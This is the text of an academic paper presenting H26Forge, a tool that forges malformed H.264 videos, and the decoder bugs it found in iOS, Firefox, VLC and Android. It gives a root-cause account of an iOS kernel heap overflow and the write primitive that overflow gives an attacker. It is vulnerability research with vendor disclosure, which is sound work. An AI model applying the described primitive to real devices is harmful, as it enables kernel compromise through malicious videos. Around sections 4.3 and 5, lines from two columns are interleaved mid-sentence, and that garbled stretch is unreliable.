The Most Dangerous Codec in the World:

Finding and Exploiting Vulnerabilities in H.264 Decoders

Willy R. Vasquez (The University of Texas at Austin)
Stephen Checkoway (Oberlin College)
Hovav Shacham (The University of Texas at Austin)

Abstract

Modern video encoding standards such as H.264 are a marvel of hidden complexity. But with hidden complexity comes hidden security risk. Decoding video in practice means interacting with dedicated hardware accelerators and the proprietary, privileged software components used to drive them. The video decoder ecosystem is obscure, opaque, diverse, highly privileged, largely untested, and highly exposed: a dangerous combination.

We introduce and evaluate H26FORGE, domain-specific infrastructure for analyzing, generating, and manipulating syntactically correct but semantically spec-non-compliant video files. Using H26FORGE, we uncover insecurity in depth across the video decoder ecosystem, including kernel memory corruption bugs in iOS, memory corruption bugs in Firefox and VLC for Windows, and video accelerator and application processor kernel memory bugs in multiple Android devices.

1 Introduction

Modern video encoding standards are a marvel of hidden complexity. As SwiftOnSecurity noted, the video-driven applications we take for granted would not have been possible without advances in video compression technology, notwithstanding increases in computational power, storage capacity, and network bandwidth.¹ But with hidden complexity comes hidden security risk.

¹ Online: https://twitter.com/SwiftOnSecurity/status/888822886420668422.

The H.264 specification is 800 pages long, despite specifying only how to decode video, not how to encode it. Because decoding is complex and costly, it is usually delegated to hardware video accelerators, either on the GPU or in a dedicated block on a system-on-chip (SoC). Decoding video in practice means interacting with these privileged hardware components and the privileged software components used to drive them, usually a system media server and a kernel driver.

Compared to other types of media that can be processed by self-contained, sandboxed software libraries, the attack surface for video processing is larger, more privileged, and, as we explain below, more heterogeneous.

On the basis of a guideline they call “The Rule Of 2,”² the Chrome developers try to avoid writing code that does more than 2 of the following: parses untrusted input, is written in a memory-unsafe language, and runs at high privilege. The video processing stack in Chrome violates the Rule of 2, and so do the corresponding stacks in other major browsers and in messaging apps, because the platform code for driving the video decoding hardware, on which they all depend, itself violates the Rule of 2.

² Online: https://chromium.googlesource.com/chromium/src/+/main/docs/security/rule-of-2.md.

Because different hardware video accelerators require different drivers, the ecosystem of privileged video processing software is highly fragmented; our analysis of Linux device trees revealed two dozen accelerator vendors. There is no one dominant open source software library for security researchers to audit.

And the features that make modern video formats so effective also make it hard to obtain high code coverage testing of video decoding stacks by means of generic tools. Consider H.264, the most popular video format today. H.264 compresses videos by finding similarities within and across frames; the similarities and differences are sent as entropy-encoded syntax elements. These syntax elements are encoded in a context-sensitive way: a change in the value of one syntax element completely changes the decoder’s interpretation of the rest of the bitstream.

An illustrative example: CVE-2022-22675. On March 31, 2022, Apple released iOS 15.4.1, which patched a bug in the kernel driver for the AppleAVD video accelerator family, included in SoCs starting with 2018’s A12. The release notes state that “Apple is aware of a report that this issue may have been actively exploited.”³

³ Online: https://support.apple.com/en-us/HT213219.

Google Project Zero’s Natalie Silvanovich performed a root cause analysis of the bug [43]. By comparing the pre-
and post-patch drivers, she identified a missing bounds check on the cpb_cnt_minus1 syntax element; she was able to produce a video that triggered the added check, but not one that caused a kernel panic. The problem was a failure of tools. As Silvanovich explained on Twitter, she “forged the file bit by bit and it was terrible. One trick I use is to build ffmpeg with symbols and break where the feature you are trying to trigger is (for example reading HRD) [...] Then you can dump the bitstream with gdb and search for the corresponding location in the file and edit it.”⁴

⁴ Online: https://twitter.com/natashenka/status/1526440524441194496.

Our contributions. We introduce and evaluate H26FORGE, domain-specific infrastructure for analyzing, generating, and manipulating syntactically correct but semantically spec-non-compliant video files.

H26FORGE maintains the recovered H.264 syntax elements in memory and allows for the programmatic adjustment of syntax elements, while correctly entropy-encoding the adjusted values. No prior tool is suited to this task. Most software that reads H.264 videos (e.g., OpenH264 and FFmpeg) focuses on producing an image as quickly as possible, so it discards recovered syntax elements once an image is generated. Tools used to debug video files (e.g., Elecard’s StreamEye) do not allow the programmatic editing of syntax elements; they focus on providing feedback to tune a video encoder.

H26FORGE can be used as a standalone tool that generates random videos for input to a video decoder; it can be programmed to produce proof-of-concept videos that trigger a specific decoder bug identified by a security researcher; and it can be driven interactively by a researcher when exploring “what-if?” scenarios for a partly understood vulnerability.

We evaluate the effectiveness of H26FORGE through two case studies.

In the first case study, we examine the security of the AppleAVD kernel driver and the AppleD5500 kernel driver used for pre-A12 SoCs.⁵

1. By playing a few hundred random H26FORGE-generated videos on an iPhone with an A9 SoC we identified two bugs. One is exploitable for controlled kernel heap corruption; the other triggers an infinite loop in a kernel thread, causing a watchdog reboot.
2. We reverse engineered the AppleD5500 driver binary and identified an apparent missing bounds check in H.265 parameter parsing. While H26FORGE does not support H.265 generation, the parameter-level entropy encoding is similar, and we were able to produce a proof-of-concept video that exploits the missing bounds check to corrupt the kernel heap and gives the attacker control of the program counter.
3. Starting from the binary diff from the CVE-2022-22675 patch, we were able to expand on Silvanovich’s root-cause analysis, generate a proof-of-concept video that corrupts the kernel heap and causes a panic, and explain why Silvanovich’s partial proof-of-concept, despite also triggering the patch, did not cause a panic.

⁵ Some Twitter commentary about CVE-2022-22675 assumed that Apple only recently moved video parsing into the iOS kernel. Not so. In fact, the first bug we identified was present in the kernel as far back as iOS 10.

In the second case study, we played a larger corpus of random H26FORGE-generated videos on a variety of Windows software and Android systems from many dated but still relevant vendors. In all, we identified a memory corruption vulnerability in Firefox video playback; a use-after-free in hardware-accelerated VLC video playback; and insecurity in depth across the hardware decoder ecosystem, including disclosure of uninitialized memory and of prior decoder state; accelerator memory corruption; and kernel driver memory corruption and crashes.

Disclosure and ethics. We have contacted (or attempted to contact; see below) all the vendors affected by our memory corruption findings.

Apple and Mozilla have acknowledged, patched, and assigned CVEs to reported bugs. The VLC maintainers have fixed the reported bug. We have reported the disclosure of uninitialized memory to Google and MediaTek. We reported the denial-of-service vulnerability to MediaTek.

Some vendors, particularly those that sell media intellectual property (“media IP”) to SoC vendors and do not regularly deal with end users, did not respond when we reached out.

2 Background

We describe the features of H.264 video compression and highlight the deployed implementations relevant to the findings we report in this paper. Readers interested in a longer, but still accessible, introduction to H.264 should consult Richardson’s monograph [41].

2.1 H.264 codec

The H.264 video codec [23] was standardized in 2003 by the International Telecommunication Union (ITU) and the Moving Picture Experts Group (MPEG). Because of this joint effort, this codec has two names: H.264 provided by the ITU, and AVC provided by MPEG. We default to H.264 when possible.

The specification describes how to decode a video, leaving encoding strategies up to software and hardware developers. Video encoding is the search problem of finding similarities within and between pictures, and turning these similarities into entropy-encoded instructions. The H.264 spec describes how to recover the instructions and reproduce a picture.

YUV, macroblocks, and slices. A video is a collection of pictures or frames made up of pixels. Each pixel is broken
down into two components: luma (brightness) and chroma (color). In H.264, luma is denoted as Y and chroma as U and V, where the latter denote blue and red components, respectively, and are used to recover the green component through a set of linear equations. Together these are called YUV values.

In H.264, frames are split into groups of 16 × 16 pixels called macroblocks. Macroblocks are the core unit used when working with frames. Macroblocks are grouped together into slices, which are used to create frames.

Prediction and deblocking. H.264 compresses videos by relying on prediction techniques to recreate a video at the endpoint. What is sent is the prediction instructions and the residue: the difference between the predicted frame and the actual frame. There are two types of prediction mechanisms in H.264: Intra prediction and Inter prediction.

Intra prediction looks for similarities within the same frame at macroblock granularity. For a macroblock, the decoder takes the edge pixels of neighboring macroblocks and predicts the image using a linear combination of these values. It then adds the residue to the predicted image to get the resulting output image.

Because images are sometimes simply translated across the screen, Inter prediction looks for similarities across frames. Inter-predicted frames copy macroblocks from reference frames and apply residues to construct the final macroblock. The decoder maintains a Decoded Picture Buffer (DPB), and uses it to create a list of reference pictures. Different macroblocks in the same picture can reference different frames in the buffer. If the macroblocks in a frame use only one reference frame, then the frame is referred to as a P frame. If two reference frames are used, then it is referred to as a B frame (for biprediction).

Because frames are reconstructed at the macroblock level, the decoder applies deblocking on the macroblock edges to produce a smoother image.

Profiles and levels. A profile in H.264 signals what features are used to decode the video. Features include the type of entropy encoding and the presence of B frames. The most common profiles are Baseline, Main, and High.

The level of a video signals the possible frame size of the video, how many frames to store in the DPB, and what the maximum possible bit rate should be.

Syntax elements. Video reconstruction instructions are called syntax elements. The possible values each syntax element can be assigned are determined by the semantics of the H.264 syntax elements. The values guide the decoder in choosing prediction variables and recovering residue information.

Syntax elements are grouped together into Network Abstraction Layer Units (NALUs). NALUs have a header signaling the type of content they contain. While the spec allows for up to 32 different types of NALUs, the most common are:

• Sequence Parameter Sets (SPS): these contain the high-level properties of the video such as: profile, level, frame size, cropping, etc. The spec allows for up to 32 SPSes in a video, but only one active at a time.
• Picture Parameter Sets (PPS): PPSes contain the compression parameters and picture reconstruction instructions. The spec allows for up to 256 PPSes. A PPS must reference a valid SPS in a video.
• Instantaneous Decoder Refresh (IDR) NALUs: IDR NALUs contain slices and force the decoder to clear out its DPB, therefore they should only contain Intra predicted slices (I slices), which do not reference any other frames. The first frame in a video is also expected to be an IDR NALU. An IDR NALU must point to a valid PPS. Slices are split into slice headers with picture information, and slice data with macroblocks that contain the prediction instructions and residue.
• Non-IDR NALUs: Non-IDR NALUs contain slices that can be Intra or Inter predicted, but maintain the decoder state. Single Inter predicted slices (P slices) contain macroblocks that reference a single frame. Bipredicted slices (B slices) can reference two frames. A non-IDR NALU also points to a valid PPS.

Syntax elements may have dependencies that impact how subsequent ones are decoded. Modifying one syntax element changes not only how the picture is produced but also how the stream is read.

Entropy encoding. To compress syntax elements, H.264 entropy encodes them with either stateless or stateful encoding procedures.

Stateless entropy encodings do not rely on neighboring values, and include binary, unary, and exponential-Golomb (exp-Golomb). All SPSes, PPSes, and slice headers are encoded in this stateless manner and are often handled by software.

Stateful entropy encodings rely on previously decoded values and are used within slice data to encode prediction modes and residue values. The two encoding options are Context-Adaptive Variable Length Coding (CAVLC) and Context-Adaptive Binary Arithmetic Coding (CABAC). CAVLC is a run-length encoding, meaning that a value is sent along with the number of times the value consecutively appears. CABAC is an arithmetic encoding in which binary values are recovered from a probability model that adjusts to the current and previous syntax elements. Both CAVLC and CABAC are more resource-intensive than the stateless options and are thus often handled by hardware.

Encoded value organization. Encoded NALUs can be organized in one of two ways: in “Annex B” format, or AVCC format. “Annex B” format [23] denotes the beginning of a NALU with start codes of value 0x00000001 or 0x000001. AVCC format includes the length of each NALU instead of a start code, and is used in MP4 files, with the avcC four character code atom containing the SPS and PPS parameters for the video, and mdat atom containing the slices.
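To make the stateless exp-Golomb coding of parameter sets and slice headers concrete, the following is a minimal sketch of the unsigned variant, in which a value v is written as the binary digits of v + 1 preceded by one fewer zero bits than that binary string has digits. It assumes the bitstream is held as a Python string of '0' and '1' characters for readability; the names encode_ue, decode_ue, and decode_all are illustrative and are not taken from H26FORGE.

```python
from typing import Tuple


def encode_ue(value: int) -> str:
    """Encode a non-negative integer as an unsigned exp-Golomb bit string."""
    if value < 0:
        raise ValueError("ue(v) only encodes non-negative integers")
    code = bin(value + 1)[2:]            # binary digits of value + 1
    return "0" * (len(code) - 1) + code  # prefix with len(code) - 1 zero bits


def decode_ue(bits: str, pos: int = 0) -> Tuple[int, int]:
    """Decode one ue(v) code starting at bit offset pos.

    Returns (value, position of the first bit after the code).
    """
    zeros = 0
    while pos + zeros < len(bits) and bits[pos + zeros] == "0":
        zeros += 1
    start = pos + zeros          # index of the first '1' bit
    end = start + zeros + 1      # the code holds zeros + 1 bits from start
    if end > len(bits):
        raise ValueError("truncated exp-Golomb code")
    return int(bits[start:end], 2) - 1, end


def decode_all(bits: str) -> list:
    """Decode back-to-back ue(v) codes until the bit string is exhausted."""
    values, pos = [], 0
    while pos < len(bits):
        value, pos = decode_ue(bits, pos)
        values.append(value)
    return values


stream = "".join(encode_ue(v) for v in [0, 3, 1])
print(stream)              # 100100010
print(decode_all(stream))  # [0, 3, 1]
```

Because each code's length depends on its own leading zeros, a decoder only learns where the next element starts after decoding the current one. This is one small instance of the dependency noted above, where changing one syntax element changes how the rest of the stream is read.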
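The "Annex B" layout described above can be illustrated with a short sketch that splits a byte stream at its start codes and reads the NALU type from the low five bits of the first header byte (five bits is what gives the 32 possible types). The helper names are hypothetical and the payload bytes in the demo are made up, so they are not valid parameter sets. The sketch also assumes that payloads never contain the start-code pattern themselves and that a NALU never ends in a 0x00 byte, so trailing zeros are treated as part of the next four-byte start code.

```python
import re

# A few nal_unit_type values; the type is a 5-bit field, hence 32 possible types.
NAL_TYPE_NAMES = {1: "non-IDR slice", 5: "IDR slice", 7: "SPS", 8: "PPS"}


def split_annex_b(stream: bytes) -> list:
    """Split an Annex B byte stream into NALUs, dropping the start codes."""
    # Both 0x000001 and 0x00000001 end in the three bytes 00 00 01.
    pieces = re.split(rb"\x00\x00\x01", stream)
    nalus = []
    for piece in pieces[1:]:            # pieces[0] precedes the first start code
        nalu = piece.rstrip(b"\x00")    # drop the extra zero of a 4-byte start code
        if nalu:
            nalus.append(nalu)
    return nalus


def nal_unit_type(nalu: bytes) -> int:
    """Return the 5-bit nal_unit_type from the first NALU header byte."""
    return nalu[0] & 0x1F


def describe(stream: bytes) -> list:
    """Name each NALU in the stream, using 'other' for types not listed above."""
    return [NAL_TYPE_NAMES.get(nal_unit_type(n), "other") for n in split_annex_b(stream)]


demo = (
    b"\x00\x00\x00\x01\x67\x42\x00\x1e"   # 4-byte start code, header 0x67 (type 7)
    b"\x00\x00\x01\x68\xce"               # 3-byte start code, header 0x68 (type 8)
    b"\x00\x00\x00\x01\x65\x88"           # 4-byte start code, header 0x65 (type 5)
)
print(describe(demo))  # ['SPS', 'PPS', 'IDR slice']
```

An AVCC reader would instead consume a length field before each NALU, which is why a tool that handles both layouts needs separate framing code for each.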
Both formats go through a process called emulation prevention, in which sequential 0x00 values within the encoded stream are ‘escaped’ by inserting an emulation-prevention byte, 0x03, after every two 0x00s. This is to prevent the decoder from mistaking the sequence for a start code.

H.264 features and extensions. The H.264 specification has a collection of features that are enabled by different profiles. Arbitrary Slice Ordering (ASO) is an error resilience feature that allows for frames to be made up of many slices that can arrive at any time. Flexible Macroblock Ordering (FMO) is like ASO, but also allows for macroblocks to be arranged in different shapes. Both are part of the Baseline profile.

Since its introduction, the specification has added extensions for new applications and scenarios. Two notable ones are Scalable Video Coding (SVC) and Multiview Video Coding (MVC), which allow for multiple sizes in one encoded video or multiple angles in a single video, respectively.

Decoding pipeline. We now describe how the components are combined to decode a typical H.264 video.

First, the decoder is set up by passing in an SPS and a PPS with frame and compression related properties. Then the decoder receives the first slice and parses the slice header syntax elements. The decoder then begins a macroblock-level reconstruction of the image. It then entropy decodes the syntax elements and passes them to either a residue reconstruction path or through a frame prediction path with previously decoded frames. Then the predicted frames are combined with the residue, passed through a deblocking engine, and finally stored in the DPB, where the frames can be accessed and presented.

2.2 Software systems that manipulate video

A wide range of software systems handle untrusted video files, providing a broad attack surface for codec bugs.

An important observation is that hardware-assisted video decoding bypasses the careful sandboxing that is otherwise in place to limit the effects of media decoding bugs.

Messengers. Popular messengers will accept video attachments in messages and provide a thumbnail preview notification. In the default configuration of many messengers, the video is processed to produce the thumbnail without user interaction, creating a zero-click attack surface.

There are many examples of video issues on mobile devices. Android has had historical issues in its Stagefright library for processing MP4 files [10, 11]. As we discuss in Section 5, video thumbnailing and decoding constitutes exploitable attack surface in Apple’s iMessage application despite the BlastDoor sandbox [18]. Third-party messengers can also be affected. In September 2022, WhatsApp disclosed a critical bug in its parsing of videos on Android and iOS.⁶

⁶ CVE-2022-27492, https://www.whatsapp.com/security/advisories/2022/.

Web. Web browsers have long allowed pages to incorporate video to play through the video HTML tag, leading to multiple vulnerabilities in video decoding. For example, both Chrome and Firefox were affected by a 2015 bug in VP9 parsing.⁷ In Section 6.1 we describe a new vulnerability we found in Firefox’s handling of H.264 files.

⁷ CVE-2015-1258 and https://crbug.com/450939 for Chrome; CVE-2015-4506 and https://bugzilla.mozilla.org/show_bug.cgi?id=1192226 for Firefox.

Despite this track record, more video processing attack surface is being exposed to the Web platform. Media Source Extensions (MSE) and Encrypted Media Extensions (EME) have been deployed in major browsers; the WebCodecs extension [1], currently only deployed in Chrome, will allow websites direct access to the hardware decoders, completely skipping over container format checks.

Modern browsers carefully sandbox most kinds of media processing libraries, but they call out to system facilities for video decoding. Hardware acceleration is more energy efficient; it allows playback of content that requires a hardware root of trust [38]; and it allows browsers to benefit from the patent licensing fees paid by the hardware suppliers.⁸

⁸ For example, Firefox won’t play H.264 videos absent hardware support.

Online platforms. Video transcoding pipelines, such as those at YouTube [40] and Facebook [26], handle user-generated content, which may contain videos that are not spec-compliant. This could lead to denial-of-service, information leakage from the execution environment or other processed videos, or even code execution.

2.3 Hardware video decoding

Video decoding in modern systems is accelerated with custom hardware. The media IP included in SoCs or GPUs is usually licensed from a third party. In one notable example, iPhone SoCs through the A11 include Imagination Technologies’ D5500 media IP (see Section 5), as do the SoCs in several Android phones we study, with very different kernel drivers layered on top.

OS integration. IP vendors build drivers for their hardware video decoders, which are then called by the OS through their own abstraction layer. The drivers will prepare the hardware to receive the encoded buffers, often through shared memory. In this section, we discuss the different OS layers provided to interface with drivers.

While Stagefright is Android’s media engine,⁹ Android uses OpenMAX (OMX) to communicate with hardware drivers. OMX abstracts the hardware layer from Stagefright, allowing for easier integration of custom hardware video decoders.

⁹ Online: https://source.android.com/docs/core/media.

Other operating systems similarly have their own abstraction layer. The Linux community has support for video decoders through the Video for Linux API version 2.¹⁰ Similar to OMX, it abstracts the driver so user space programs do not have to worry about the underlying hardware. Windows relies on DirectX Video Acceleration 2.0¹¹ and Apple uses VideoToolbox.¹² Intel also has its own Linux abstraction layer called the Video Acceleration API¹³ and, similarly, Nvidia has the Video Decode and Presentation API for UNIX.¹⁴

¹⁰ Online: https://www.kernel.org/doc/html/latest/userspace-api/media/v4l/v4l2.html.
¹¹ Online: https://learn.microsoft.com/en-us/windows/win32/medfound/directx-video-acceleration-2-0.
¹² Online: https://developer.apple.com/documentation/videotoolbox.
¹³ Online: https://www.intel.com/content/www/us/en/developer/articles/technical/linuxmedia-vaapi.html.
¹⁴ Online: https://vdpau.pages.freedesktop.org/libvdpau/.

Hardware video decoding companies. Table 1 lists 25 companies we found that have unique video decode IPs. Some of these may license from other companies, or may produce their own video codec IP. The companies include providers for Single-Board Computers (SBCs), set-top boxes, tablets, phones, and video conferencing systems. Some video decode IP companies describe providing drivers, RTL, and models for incorporating the IP into SoCs.

We highlight all of these companies to showcase the heterogeneity of available hardware video decoders, and thus the potential for vulnerabilities to exist within or across products.

Table 1: Companies that produce hardware video decoders.

Company                     Product Name
Allegro DVT                 AL-D series
Allwinner                   CedarV
AMD                         Video Coding Engine
Amlogic                     Amlogic Video Engine
Amphion¹                    Malone
Apple                       AppleAVD
Arm                         Mali Video Engine
Broadcom                    Crystal HD and VideoCore
Cast                        Baseline Decoders
Chips’N Media               Coda
HiSilicon                   VDEC
Imagination Technologies    PowerVR MSVDX D-series
Intel                       QuickSync
MediaTek                    VPU
MStar Semi²                 Decoder
Nvidia                      NVDEC
Qualcomm                    Venus
Realtek                     RTD series
RockChip³                   RKVdec
Samsung                     Multi-Format Codec (MFC)
STMicroelectronics          DELTA
Texas Instruments           IVA-HD
UNISOC⁴                     Video Signal Processing Unit (VSP)
VeriSilicon                 Hantro
VYUSync                     H.264 Decoder

¹ Purchased by Allegro DVT.
² Merged with MediaTek; main use is set-top boxes.
³ May just be VeriSilicon Hantro.
⁴ Formerly Spreadtrum.

3 Threat Model

In this paper, we assume an adversary who (1) produces one or more malicious video files; and (2) causes one or more targets to decode the videos. As we discuss in Section 2.2, delivering videos to the user and having them be decoded, with or without user interaction, is easy to accomplish in many cases. This is the minimal set of capabilities an adversary needs to exploit a vulnerability in decoding software or hardware.

For information disclosure attacks (see, for example, Sections 6.1 and 6.3.2), the adversary (3) must be able to read frames of decoded video. For malicious videos delivered via the web, for example, this can be accomplished via JavaScript.

4 H26FORGE

This section describes H26FORGE, domain-specific infrastructure for analyzing, generating, and manipulating syntactically correct but semantically spec-non-compliant video files. The goal of H26FORGE is to reduce the burden of working with H.264 encoded videos when evaluating H.264 decoders. H26FORGE is available at https://github.com/h26forge/h26forge.

H26FORGE has two main modes of operation: editing and generation. We provide an overview of H26FORGE then describe each mode in detail.

4.1 Overview

Figure 1: H26FORGE internals. [Diagram with five stages: Inputs, Input Handling, Syntax Manipulation, Output Handling, Outputs. Labeled components: Video Transform, Encoded Bitstream, Generation Parameters, Entropy Decoding, Video Modification, Video Generation, Entropy Encoding, MP4 Muxing, WebCodecs AVCC, JSON Dump, Muxed MP4, AVCC.js.]

Implementation. H26FORGE is written in around 30k lines of Rust code, and has a Python scripting backend for writing video modification scripts. Figure 1 shows the various components of H26FORGE. It has three main parts: input handling, syntax manipulation, and output handling. The input handling contains the H.264 entropy decoding. Syntax manipulation has functions for modifying recovered syntax elements or generating random videos. Output handling has
the H.264 entropy encoding, which outputs videos in “Annex B” format, but can also output a WebCodecs friendly AVCC file, muxed MP4 file, or JSON dump of the decoded syntax elements. For MP4 muxing, we rely on a modified version of the minimp4 Rust crate that avoids modifying the generated H.264 bitstream, and inserts only the first observed SPS and PPS into the avcC atom.

H26FORGE works by entropy decoding and encoding H.264 bitstreams and maintaining the recovered syntax values in memory for mutation. We initially considered modifying an existing tool that does H.264 encoding and decoding but found all to be poorly suited for this task. Specifically, existing tools focus on producing frames of video as quickly as possible rather than manipulating the syntax elements that make up the video. As a result, the syntax elements themselves are discarded as soon as the video frame is decoded. Since the overall architecture and core data structures of existing tools would need to be significantly modified to suit our goals, we opted for a green field implementation.

Evaluating correctness. By focusing only on entropy-decoding and encoding syntax elements, H26FORGE supports many H.264 features. Crucially, H26FORGE maintains the dependencies across syntax elements, enabling the correct entropy-encoding of slice data. H26FORGE supports a majority of the Baseline, Main, Extended, and High profiles, and some features of the SVC and MVC extensions. H26FORGE does not currently support CAVLC 422/444 chroma subsampling, FMO decoding, or SVC/MVC slices.

Because entropy encoding and decoding is a complex process, we verified the correctness of H26FORGE by running it on the official test videos provided by the ITU [24]. According to the ITU, a decoder can claim conformance to a profile and level if it can decode the associated test videos.

We tested H26FORGE on the Constrained Baseline, Baseline, Extended, and Main profiles, as these are the profiles supported by the majority of decoders we examine. We achieve 98% conformance on the test videos. Of the 135 test videos, 80 are bit-for-bit identical after re-encoding with H26FORGE, 52 have the same syntax elements, and 3 Baseline videos cannot be decoded by H26FORGE because they use FMO.

4.2 Editing mode

Users can programmatically edit a video with Python scripts called video transforms. We use this feature to generate non-conforming videos as well as videos containing specific syntax elements. To help transform writers, we wrote a “helper” library with commonly encountered actions such as updating dependent variables or creating NALUs with default values.

As an example of how editing mode works, we introduce a video that has all top-most macroblocks set to vertical Intra prediction called Luma Chroma Thief. Non-spec behavior like what Luma Chroma Thief exhibits would not naturally arise in an encoded video, and manual creation of such a video would be difficult due to values being CABAC encoded. In Listing 1, we show how to produce Luma Chroma Thief with a video transform that sets all the first slice macroblocks to be vertically Intra predicted with only 17 lines of code. This example demonstrates how transforms can build on top of each other, here using a transform that removes the first frame residue. This example also shows how some of the dependent syntax elements are changed by setting the individual coded block pattern luma and chroma components.

Listing 1: Luma Chroma Thief video transform example.

    def luma_chroma_thief_16x16(ds):
        """Turn first slice into a LCT using 16x16 luma chroma prediction"""
        from slice_one_remove_residue import remove_first_frame_residue
        from helpers import set_cbp_chroma_and_luma
        ds = remove_first_frame_residue(ds)
        # disable deblocking filter to prevent post-processing
        ds["ppses"][0]["deblocking_filter_control_present_flag"] = True
        ds["slices"][0]["sh"]["disable_deblocking_filter_idc"] = 1
        for i in range(len(ds["slices"][0]["sd"]["macroblock_vec"])):
            # luma prediction set by Macroblock type
            ds["slices"][0]["sd"]["macroblock_vec"][i]["mb_type"] = "I16x16_0_0_0"
            # ensure values are correct for encoding
            ds["slices"][0]["sd"]["macroblock_vec"][i]["coded_block_pattern"] = 0
            ds = set_cbp_chroma_and_luma(0, i, ds)
            # vertical chroma prediction
            ds["slices"][0]["sd"]["macroblock_vec"][i]["intra_chroma_pred_mode"] = 2
        return ds

In Section 5.3 we further demonstrate how we use video transforms to produce iterative videos to gain an understanding of, and exploit, a bug in the Apple video decoder.

4.3 Generation mode

Video generation is the process of producing videos with syntax elements at a desired value or range. Given the dependencies between syntax elements, H26FORGE will ensure dependencies are maintained as values are randomized. H26FORGE comes with the syntax element ranges set to their minimum and maximum possible values, but they can be adjusted by passing in generation parameters. H26FORGE purposefully ignores non-syntax enforced constraints detailed by the H.264 specification, such as the fact that certain features are allowed only in certain profiles.

Figure 2 shows an example of a generated I frame, featuring randomized prediction modes and residue values.

Figure 2: An example of a generated I frame.

Generation options. When generating videos, H26FORGE can ignore certain syntax elements or combinations to focus efforts on different areas of interest. For example, lossless macroblocks do not stress the video decoder because the YUV values are directly passed, so H26FORGE includes an option to ignore them. If we want to focus on finding vulnerabilities at the parameter set level, H26FORGE has an “empty slice data” option which produces no residue and no prediction instructions. Because some decoders may only check the bounds of SPS and PPS parameters during initialization, H26FORGE provides a “safe prepend” option that prepends a known good video to the encoded output, so that subsequent SPSes and PPSes stress test runtime checking.

To facilitate exploration of decoder features, H26FORGE has a “small” video generation option that limits the frame size to 128 × 128 pixels. This significantly reduces the video

5.1 Finding new vulnerabilities

We used H26FORGE’s H.264-grammar-aware video generator (see Section 4.3) to produce syntactically correct H.264 video streams with structured random data. We played these videos on a physical iPhone SE (first generation) with an A9 SoC running iOS 13.3 and on a virtual iPhone SE (first generation) running iOS 15.5 (most recent at time of discovery) in
Corellium.15 Corellium gives us kernel debugging capabilities
generation time, though it reduces the ability to explore issues
along with the ability to test on different iOS versions.
that may arise from large frame buffers.
Our fuzzing setup consisted of (1) generating a batch of
Global video parameters. Generation mode starts by sam- 100 videos on a host machine, (2) transferring them to the iOS
pling global video parameters. First is the number of NALUs device under test (through iTunes on the physical phone and
to generate for the video—longer videos require more time via scp on the virtual phone), (3) scrolling through the folder
to generate, but may expose stateful vulnerabilities. Next is the videos were in to trigger thumbnailing, (4) then opening
whether to enable certain H.264 extensions such as SVC or each video in the QuickLook viewer to decode completely.
MVC. Because extensions are often not supported by video We tested 67 batches in all.
decoders, H26F ORGE biases towards no extensions, but this With this setup, we found two bugs in the AppleD5500.kext.
can be adjusted. With these two global video parameters, The first bug enables a partly-controlled heap memory over-
H26F ORGE proceeds to generate the contents of each NALU. write. The second bug causes an infinite loop and leads to
Parameter set and slice generation. All decoding interfaces a kernel panic. These bugs have been confirmed, patched,
require passing in the SPS and PPS to prepare the decoder, and assigned CVEs by Apple. We verified that they can be
so H26F ORGE generates those first. After that, H26F ORGE triggered by a web page visited in Safari.
leans towards producing slice NALUs. The first slice is biased Bug 1: partly-controlled heap memory overwrite. The
towards being an IDR I slice to reduce the likelihood that the first issue we discovered is an out-of-bounds kernel write
decoder quits at the first slice. Even though decoders are caused by a buffer overflow in the bitstream reader of the
expected to be error-resilient, generally having no reference AppleD5500.kext. The overflow can be triggered by playing
frame prevents B or P slices from being properly decoded. or generating a preview thumbnail of a malformed video. A
As the slices are generated, it takes into consideration slice video randomly generated by H26F ORGE triggered this bug
property options, such as no lossless macroblocks or empty and caused a kernel panic due to a write to an unmapped
residue values. address; we then reverse engineered the affected code to per-
form a root-cause analysis and used H26F ORGE interactively
to show that the bug is exploitable for controlled heap corrup-
5 Using H26F ORGE: An Apple case study tion. This was assigned CVE-2022-32939 and patched in iOS
15.7.1 and 16.1 and iPadOS 15.7.1 and 16 [2, 3].
H26F ORGE’s ability to produce syntactically correct H.264
Recall from Section 2.1 that emulation-prevention bytes
files with specific semantic errors enables multiple modes of
(EPBs) are used to escape patterns that may be confused
security analysis. In the following sections, we describe three
as NALU start codes in an encoded stream. The Apple-
different ways to use H26F ORGE. First, H26F ORGE can
D5500.kext bitstream reader object keeps track of how many
be used to find new vulnerabilities in video-handling code.
EPBs it has seen, along with the bit offset in the bitstream
Second, H26F ORGE enables the analyst to produce proof-
where each EPB was found (presumably to simplify subse-
of-concept videos which validate their understanding of a
quent stream processing).
bug. Third, H26F ORGE enables rapid interactive testing to
The array in which EPB offsets are tracked has 256 ele-
understand existing exploits.
ments, but a check that no more than 256 EPBs have been
We explore each of these three analytical modes in the con-
encountered is missing. A 257th EPB overflows the array and
text of Apple’s iOS video-handling drivers. For the first two
overwrites the reader object member variable immediately
parts we look at issues in the AppleD5500 kernel extension
after it, which happens to be the count of EPBs encountered
(kext), found on A11 SoCs and older. The D5500 is Imagi-
so far. As a consequence, the location of a 258th EPB will be
nation Technologies’ media IP that decodes MPEG4, H.264,
recorded at an array index now controlled by the attacker. Sub-
and H.265, and the AppleD5500.kext is the driver to facilitate
sequent EPBs will trigger contiguous out-of-bounds writes as
hardware communication. For our third analytical mode we
this count is incremented.
look at the AppleAVD.kext, Apple’s in-house video decode IP
The bug therefore gives the attacker a heap skip-and-write
available in A12 SoCs and newer that handles H.264, H.265,
primitive, with the location of the 257th EPB controlling
and VP9 video decoding. While both drivers decode H.264,
the vulnerabilities are only applicable to the noted driver. 15 Online: https://www.corellium.com/.
the amount of the skip, and the locations of the 258th and subsequent EPBs controlling the values written after the skip. File format constraints mean that the skip amount and the values written are only partly attacker controlled. The EPBs must be in a single NALU, as the bitstream reader context is reset with each NALU. Details of how an EPB offset is calculated and stored mean that the values written after the skip are small negative 32-bit values.¹⁶

With the help of H26Forge, we were able to confirm that a malicious video can overwrite heap memory following the bitstream reader object with (small negative) values of the attacker’s choice, confirming our root-cause analysis. Exploiting the bug for kernel code execution would require careful kernel heap grooming to choose the overwritten object, and likely a kernel memory disclosure bug to defeat kernel ASLR. We did not attempt to develop an end-to-end exploit chain; however, Apple’s assessment was that the bug may allow an app “to execute arbitrary code with kernel privileges.”

